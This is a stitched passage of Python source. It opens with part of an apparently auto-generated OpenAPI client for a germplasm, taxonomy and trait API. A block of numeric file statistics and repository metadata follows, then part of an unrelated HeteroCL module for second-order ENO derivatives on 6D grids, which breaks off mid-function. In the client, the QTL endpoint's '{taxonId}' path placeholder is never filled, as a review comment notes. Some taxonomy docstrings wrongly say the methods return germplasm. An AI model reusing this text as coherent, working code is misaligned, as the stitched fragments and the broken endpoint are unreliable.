    NOTE(review): the URL template below uses ``{taxonId}`` but the only
    path params supplied are ``germplasmId`` and ``traitId``, so
    ``{taxonId}`` is never substituted. This looks like a spec/codegen
    mismatch upstream — confirm the intended path against the server's
    OpenAPI spec before changing it; behavior is preserved here.
    """
    all_params = ['germplasm_id', 'trait_id']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # `.items()` is equivalent to `six.iteritems` on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_qtl_by_germplasm_trait" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'germplasm_id' is set
    if ('germplasm_id' not in params or
            params['germplasm_id'] is None):
        raise ValueError("Missing the required parameter `germplasm_id` when calling `get_qtl_by_germplasm_trait`")  # noqa: E501
    # verify the required parameter 'trait_id' is set
    if ('trait_id' not in params or
            params['trait_id'] is None):
        raise ValueError("Missing the required parameter `trait_id` when calling `get_qtl_by_germplasm_trait`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'germplasm_id' in params:
        path_params['germplasmId'] = params['germplasm_id']  # noqa: E501
    if 'trait_id' in params:
        path_params['traitId'] = params['trait_id']  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # `async` is reserved on Python 3.7+; dict-splat keeps the same
    # keyword reaching call_api without the syntax error.
    return self.api_client.call_api(
        '/qtl/taxon/{taxonId}/trait/{traitId}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[QTL]',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def get_taxonomy(self, **kwargs):  # noqa: E501
    """Returns all germplasm we have  # noqa: E501

    Synchronous by default; passing async=True makes the underlying
    request asynchronous and returns the request thread instead of the
    response payload.

    >>> thread = api.get_taxonomy(async=True)
    >>> result = thread.get()

    :param async bool
    :return: list[Taxonomy]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: only the deserialized payload is wanted.
    kwargs['_return_http_data_only'] = True
    return self.get_taxonomy_with_http_info(**kwargs)  # noqa: E501
def get_taxonomy_with_http_info(self, **kwargs):  # noqa: E501
    """Returns all germplasm we have  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_taxonomy_with_http_info(async=True)
    >>> result = thread.get()

    :param async bool
    :return: list[Taxonomy]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    """
    all_params = []  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # `.items()` is equivalent to `six.iteritems` on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_taxonomy" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # `async` is reserved on Python 3.7+; dict-splat keeps the same
    # keyword reaching call_api without the syntax error.
    return self.api_client.call_api(
        '/taxon/', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[Taxonomy]',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def get_taxonomy_by_id(self, id, **kwargs):  # noqa: E501
    """Returns all germplasm we have  # noqa: E501

    Synchronous by default; passing async=True makes the underlying
    request asynchronous and returns the request thread instead of the
    response payload.

    >>> thread = api.get_taxonomy_by_id(id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str id: Unique database ID for the taxonomy (required)
    :return: Taxonomy
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: only the deserialized payload is wanted.
    kwargs['_return_http_data_only'] = True
    return self.get_taxonomy_by_id_with_http_info(id, **kwargs)  # noqa: E501
def get_taxonomy_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Returns all germplasm we have  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_taxonomy_by_id_with_http_info(id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str id: Unique database ID for the taxonomy (required)
    :return: Taxonomy
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    :raises ValueError: when the required `id` is missing or None.
    """
    all_params = ['id']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # `.items()` is equivalent to `six.iteritems` on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_taxonomy_by_id" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'id' is set
    if ('id' not in params or
            params['id'] is None):
        raise ValueError("Missing the required parameter `id` when calling `get_taxonomy_by_id`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'id' in params:
        path_params['id'] = params['id']  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # `async` is reserved on Python 3.7+; dict-splat keeps the same
    # keyword reaching call_api without the syntax error.
    return self.api_client.call_api(
        '/taxon/{id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Taxonomy',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def get_traits(self, **kwargs):  # noqa: E501
    """Returns all phenotypes we have  # noqa: E501

    Synchronous by default; passing async=True makes the underlying
    request asynchronous and returns the request thread instead of the
    response payload.

    >>> thread = api.get_traits(async=True)
    >>> result = thread.get()

    :param async bool
    :return: list[Phenotype]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: only the deserialized payload is wanted.
    kwargs['_return_http_data_only'] = True
    return self.get_traits_with_http_info(**kwargs)  # noqa: E501
def get_traits_with_http_info(self, **kwargs):  # noqa: E501
    """Returns all phenotypes we have  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_traits_with_http_info(async=True)
    >>> result = thread.get()

    :param async bool
    :return: list[Phenotype]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    """
    all_params = []  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # `.items()` is equivalent to `six.iteritems` on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_traits" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # `async` is reserved on Python 3.7+; dict-splat keeps the same
    # keyword reaching call_api without the syntax error.
    return self.api_client.call_api(
        '/trait/', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[Phenotype]',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def get_traits_by_germplasm(self, germplasm_id, **kwargs):  # noqa: E501
    """Returns all phenotypes for a germplasm that we have  # noqa: E501

    Synchronous by default; passing async=True makes the underlying
    request asynchronous and returns the request thread instead of the
    response payload.

    >>> thread = api.get_traits_by_germplasm(germplasm_id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str germplasm_id: Unique database ID for the germplasm (required)
    :return: list[Phenotype]
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: only the deserialized payload is wanted.
    kwargs['_return_http_data_only'] = True
    return self.get_traits_by_germplasm_with_http_info(germplasm_id, **kwargs)  # noqa: E501
def get_traits_by_germplasm_with_http_info(self, germplasm_id, **kwargs):  # noqa: E501
    """Returns all phenotypes for a germplasm that we have  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.get_traits_by_germplasm_with_http_info(germplasm_id, async=True)
    >>> result = thread.get()

    :param async bool
    :param str germplasm_id: Unique database ID for the germplasm (required)
    :return: list[Phenotype]
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: on an unexpected keyword argument.
    :raises ValueError: when the required `germplasm_id` is missing or None.
    """
    all_params = ['germplasm_id']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # `.items()` is equivalent to `six.iteritems` on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_traits_by_germplasm" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'germplasm_id' is set
    if ('germplasm_id' not in params or
            params['germplasm_id'] is None):
        raise ValueError("Missing the required parameter `germplasm_id` when calling `get_traits_by_germplasm`")  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'germplasm_id' in params:
        path_params['germplasmId'] = params['germplasm_id']  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None

    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = []  # noqa: E501

    # `async` is reserved on Python 3.7+; dict-splat keeps the same
    # keyword reaching call_api without the syntax error.
    return self.api_client.call_api(
        '/trait/germplasm/{germplasmId}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='list[Phenotype]',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
| 36.860735
| 133
| 0.594558
| 4,398
| 38,114
| 4.90291
| 0.040928
| 0.047118
| 0.028567
| 0.03673
| 0.968743
| 0.964801
| 0.96276
| 0.95803
| 0.952233
| 0.946714
| 0
| 0.014927
| 0.314478
| 38,114
| 1,033
| 134
| 36.896418
| 0.810357
| 0.053996
| 0
| 0.814488
| 0
| 0
| 0.161395
| 0.04198
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.007067
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
12ea3249a0962731f4a9cdce4b003e6bbe81d62b
| 30,158
|
py
|
Python
|
spatialDerivatives/second_orderENO6D.py
|
kensukenk/optimized_dp
|
4771787366ca04139c168c8988dad378ad404ab6
|
[
"MIT"
] | 41
|
2020-06-23T01:58:03.000Z
|
2022-03-28T01:45:12.000Z
|
spatialDerivatives/second_orderENO6D.py
|
kensukenk/optimized_dp
|
4771787366ca04139c168c8988dad378ad404ab6
|
[
"MIT"
] | 1
|
2021-08-01T06:58:57.000Z
|
2021-08-01T06:58:57.000Z
|
spatialDerivatives/second_orderENO6D.py
|
kensukenk/optimized_dp
|
4771787366ca04139c168c8988dad378ad404ab6
|
[
"MIT"
] | 20
|
2020-06-05T20:52:02.000Z
|
2022-03-01T03:17:39.000Z
|
import heterocl as hcl
from computeGraphs.CustomGraphFunctions import *
############################## 6D DERIVATIVE FUNCTIONS #############################
def secondOrderX6_6d(i, j, k, l, m, n, V, g):  # Left -> right == Outer Most -> Inner Most
    """Second-order one-sided derivative of V along dimension 5 (index n).

    Builds left- and right-biased approximations of dV/dx at grid point
    (i, j, k, l, m, n) from first divided differences plus a
    second-difference correction; the correction uses whichever of
    D2_i / D2_i_plus_1 has the smaller magnitude.

    :param i,j,k,l,m,n: grid indices; n indexes the differentiated dim.
    :param V: 6-D HeteroCL tensor of values.
    :param g: grid object; g.dx[5] is the spacing in this dimension.
    :return: (left_deriv, right_deriv) as staged scalar values.

    NOTE(review): hcl.if_/elif_/else_ are HeteroCL staged control-flow
    constructs, and my_abs/my_sign come from CustomGraphFunctions
    (presumably elementwise abs and sign — confirm there).
    """
    left_deriv = hcl.scalar(0, "left_deriv")
    right_deriv = hcl.scalar(0, "right_deriv")
    dim_idx = 5  # this function differentiates along the innermost axis
    u_i = V[i, j, k, l, m, n]
    # --- lower boundary: no n-1 neighbor, synthesize it from u_i ---
    with hcl.if_(n == 0):
        u_i_minus_1 = hcl.scalar(0, "u_i_minus_1")
        u_i_plus_1 = V[i, j, k, l, m, n + 1]
        u_i_plus_2 = V[i, j, k, l, m, n + 2]
        # extrapolated value standing in for V[..., n-1]
        u_i_minus_1[0] = u_i + my_abs(u_i_plus_1 - u_i) * my_sign(u_i)
        D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
        D1_i_minus_half = (u_i - u_i_minus_1[0]) / g.dx[dim_idx]
        Q1d_left = D1_i_minus_half
        Q1d_right = D1_i_plus_half
        # second divided differences at i and i+1
        D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
        u_i_plus_1_plus_1 = u_i_plus_2
        D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
        D1_i_plus_1_minus_half = D1_i_plus_half
        D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
        # pick the smaller-magnitude second difference as the correction
        with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
            c = D2_i
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
        with hcl.else_():
            c = D2_i_plus_1
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
    # --- upper boundary: no n+1 or n+2 neighbor, synthesize both ---
    with hcl.elif_(n == V.shape[dim_idx] - 1):
        u_i_plus_1 = hcl.scalar(0, "u_i_plus_1")
        u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
        u_i_minus_1 = V[i, j, k, l, m, n - 1]
        u_i_plus_1[0] = u_i + my_abs(u_i - u_i_minus_1) * my_sign(u_i)
        u_i_plus_2[0] = u_i_plus_1[0] + my_abs(u_i_plus_1[0] - u_i) * my_sign(u_i_plus_1[0])
        D1_i_plus_half = (u_i_plus_1[0] - u_i) / g.dx[dim_idx]
        D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
        Q1d_left = D1_i_minus_half
        Q1d_right = D1_i_plus_half
        D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
        u_i_plus_1_plus_1 = u_i_plus_2[0]
        D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1[0]) / g.dx[dim_idx]
        D1_i_plus_1_minus_half = D1_i_plus_half
        D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
        with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
            c = D2_i
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
        with hcl.else_():
            c = D2_i_plus_1
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
    # --- one in from the upper boundary: only n+2 must be synthesized ---
    with hcl.elif_(n == V.shape[dim_idx] - 2):
        u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
        u_i_plus_1 = V[i, j, k, l, m, n + 1]
        u_i_minus_1 = V[i, j, k, l, m, n - 1]
        u_i_plus_2[0] = u_i_plus_1 + my_abs(u_i_plus_1 - u_i) * my_sign(u_i_plus_1)
        D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
        D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
        Q1d_left = D1_i_minus_half
        Q1d_right = D1_i_plus_half
        D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
        u_i_plus_1_plus_1 = u_i_plus_2[0]
        D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
        D1_i_plus_1_minus_half = D1_i_plus_half
        D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
        with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
            c = D2_i
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
        with hcl.else_():
            c = D2_i_plus_1
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
    # --- interior: all four neighbors exist, read them directly ---
    with hcl.else_():
        u_i_minus_1 = V[i, j, k, l, m, n - 1]
        u_i_plus_1 = V[i, j, k, l, m, n + 1]
        u_i_plus_2 = V[i, j, k, l, m, n + 2]
        D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
        D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
        Q1d_left = D1_i_minus_half
        Q1d_right = D1_i_plus_half
        D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
        u_i_plus_1_plus_1 = u_i_plus_2
        D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
        D1_i_plus_1_minus_half = D1_i_plus_half
        D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
        with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
            c = D2_i
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
        with hcl.else_():
            c = D2_i_plus_1
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
    return left_deriv[0], right_deriv[0]
def secondOrderX5_6d(i, j, k, l, m, n, V, g):  # Left -> right == Outer Most -> Inner Most
    """Second-order one-sided derivative of V along dimension 4 (index m).

    Same scheme as secondOrderX6_6d but differentiates along the fifth
    grid dimension: first divided differences plus the smaller-magnitude
    second-difference correction, with extrapolated values at the
    boundaries.

    :param i,j,k,l,m,n: grid indices; m indexes the differentiated dim.
    :param V: 6-D HeteroCL tensor of values.
    :param g: grid object; g.dx[4] is the spacing in this dimension.
    :return: (left_deriv, right_deriv) as staged scalar values.

    NOTE(review): hcl.if_/elif_/else_ are HeteroCL staged control-flow
    constructs, and my_abs/my_sign come from CustomGraphFunctions
    (presumably elementwise abs and sign — confirm there).
    """
    left_deriv = hcl.scalar(0, "left_deriv")
    right_deriv = hcl.scalar(0, "right_deriv")
    dim_idx = 4  # this function differentiates along the fifth axis
    u_i = V[i, j, k, l, m, n]
    # --- lower boundary: no m-1 neighbor, synthesize it from u_i ---
    with hcl.if_(m == 0):
        u_i_minus_1 = hcl.scalar(0, "u_i_minus_1")
        u_i_plus_1 = V[i, j, k, l, m + 1, n]
        u_i_plus_2 = V[i, j, k, l, m + 2, n]
        # extrapolated value standing in for V[..., m-1, ...]
        u_i_minus_1[0] = u_i + my_abs(u_i_plus_1 - u_i) * my_sign(u_i)
        D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
        D1_i_minus_half = (u_i - u_i_minus_1[0]) / g.dx[dim_idx]
        Q1d_left = D1_i_minus_half
        Q1d_right = D1_i_plus_half
        # second divided differences at i and i+1
        D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
        u_i_plus_1_plus_1 = u_i_plus_2
        D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
        D1_i_plus_1_minus_half = D1_i_plus_half
        D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
        # pick the smaller-magnitude second difference as the correction
        with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
            c = D2_i
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
        with hcl.else_():
            c = D2_i_plus_1
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
    # --- upper boundary: no m+1 or m+2 neighbor, synthesize both ---
    with hcl.elif_(m == V.shape[dim_idx] - 1):
        u_i_plus_1 = hcl.scalar(0, "u_i_plus_1")
        u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
        u_i_minus_1 = V[i, j, k, l, m - 1, n]
        u_i_plus_1[0] = u_i + my_abs(u_i - u_i_minus_1) * my_sign(u_i)
        u_i_plus_2[0] = u_i_plus_1[0] + my_abs(u_i_plus_1[0] - u_i) * my_sign(u_i_plus_1[0])
        D1_i_plus_half = (u_i_plus_1[0] - u_i) / g.dx[dim_idx]
        D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
        Q1d_left = D1_i_minus_half
        Q1d_right = D1_i_plus_half
        D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
        u_i_plus_1_plus_1 = u_i_plus_2[0]
        D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1[0]) / g.dx[dim_idx]
        D1_i_plus_1_minus_half = D1_i_plus_half
        D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
        with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
            c = D2_i
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
        with hcl.else_():
            c = D2_i_plus_1
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
    # --- one in from the upper boundary: only m+2 must be synthesized ---
    with hcl.elif_(m == V.shape[dim_idx] - 2):
        u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
        u_i_plus_1 = V[i, j, k, l, m + 1, n]
        u_i_minus_1 = V[i, j, k, l, m - 1, n]
        u_i_plus_2[0] = u_i_plus_1 + my_abs(u_i_plus_1 - u_i) * my_sign(u_i_plus_1)
        D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
        D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
        Q1d_left = D1_i_minus_half
        Q1d_right = D1_i_plus_half
        D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
        u_i_plus_1_plus_1 = u_i_plus_2[0]
        D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
        D1_i_plus_1_minus_half = D1_i_plus_half
        D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
        with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
            c = D2_i
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
        with hcl.else_():
            c = D2_i_plus_1
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
    # --- interior: all four neighbors exist, read them directly ---
    with hcl.else_():
        u_i_minus_1 = V[i, j, k, l, m - 1, n]
        u_i_plus_1 = V[i, j, k, l, m + 1, n]
        u_i_plus_2 = V[i, j, k, l, m + 2, n]
        D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
        D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
        Q1d_left = D1_i_minus_half
        Q1d_right = D1_i_plus_half
        D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
        u_i_plus_1_plus_1 = u_i_plus_2
        D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
        D1_i_plus_1_minus_half = D1_i_plus_half
        D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
        with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
            c = D2_i
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
        with hcl.else_():
            c = D2_i_plus_1
            Q2d = c * g.dx[dim_idx]
            left_deriv[0] = Q1d_left + Q2d
            right_deriv[0] = Q1d_right - Q2d
    return left_deriv[0], right_deriv[0]
def secondOrderX4_6d(i, j, k, l, m, n, V, g): # Left -> right == Outer Most -> Inner Most
    """Second-order one-sided approximations of dV/dx along dimension 3 (index l).

    Returns ``(left_deriv, right_deriv)`` at grid point ``(i, j, k, l, m, n)``.
    Each one-sided derivative is the first divided difference corrected by the
    smaller-in-magnitude of two centered second differences (ENO-style limiting).
    Points on or next to the grid boundary substitute extrapolated ghost values
    for the missing neighbors.

    NOTE(review): the ghost-cell extrapolation formula
    ``u_ghost = u + |du| * sign(u)`` mirrors the sibling secondOrderX*_6d
    functions — confirm it against the scheme's reference implementation.
    """
    left_deriv = hcl.scalar(0, "left_deriv")
    right_deriv = hcl.scalar(0, "right_deriv")
    dim_idx = 3
    dx = g.dx[dim_idx]  # grid spacing along this dimension, invariant below
    u_i = V[i, j, k, l, m, n]

    def _set_derivs(u_im1, u_ip1, u_ip2):
        # Shared tail: compute both one-sided derivatives from the four-point
        # stencil. Identical to the per-branch code it replaces.
        D1_i_plus_half = (u_ip1 - u_i) / dx
        D1_i_minus_half = (u_i - u_im1) / dx
        D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / dx)
        D1_i_plus_1_plus_half = (u_ip2 - u_ip1) / dx
        D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_half) / dx)
        # Use the smaller-magnitude second difference as the correction term.
        with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
            Q2d = D2_i * dx
            left_deriv[0] = D1_i_minus_half + Q2d
            right_deriv[0] = D1_i_plus_half - Q2d
        with hcl.else_():
            Q2d = D2_i_plus_1 * dx
            left_deriv[0] = D1_i_minus_half + Q2d
            right_deriv[0] = D1_i_plus_half - Q2d

    with hcl.if_(l == 0):
        # Lower boundary: extrapolate the missing left neighbor.
        u_i_plus_1 = V[i, j, k, l + 1, m, n]
        u_i_plus_2 = V[i, j, k, l + 2, m, n]
        u_i_minus_1 = hcl.scalar(0, "u_i_minus_1")
        u_i_minus_1[0] = u_i + my_abs(u_i_plus_1 - u_i) * my_sign(u_i)
        _set_derivs(u_i_minus_1[0], u_i_plus_1, u_i_plus_2)
    with hcl.elif_(l == V.shape[dim_idx] - 1):
        # Upper boundary: extrapolate both missing right neighbors.
        u_i_minus_1 = V[i, j, k, l - 1, m, n]
        u_i_plus_1 = hcl.scalar(0, "u_i_plus_1")
        u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
        u_i_plus_1[0] = u_i + my_abs(u_i - u_i_minus_1) * my_sign(u_i)
        u_i_plus_2[0] = u_i_plus_1[0] + my_abs(u_i_plus_1[0] - u_i) * my_sign(u_i_plus_1[0])
        _set_derivs(u_i_minus_1, u_i_plus_1[0], u_i_plus_2[0])
    with hcl.elif_(l == V.shape[dim_idx] - 2):
        # One cell inside the upper boundary: only u_{l+2} must be extrapolated.
        u_i_plus_1 = V[i, j, k, l + 1, m, n]
        u_i_minus_1 = V[i, j, k, l - 1, m, n]
        u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
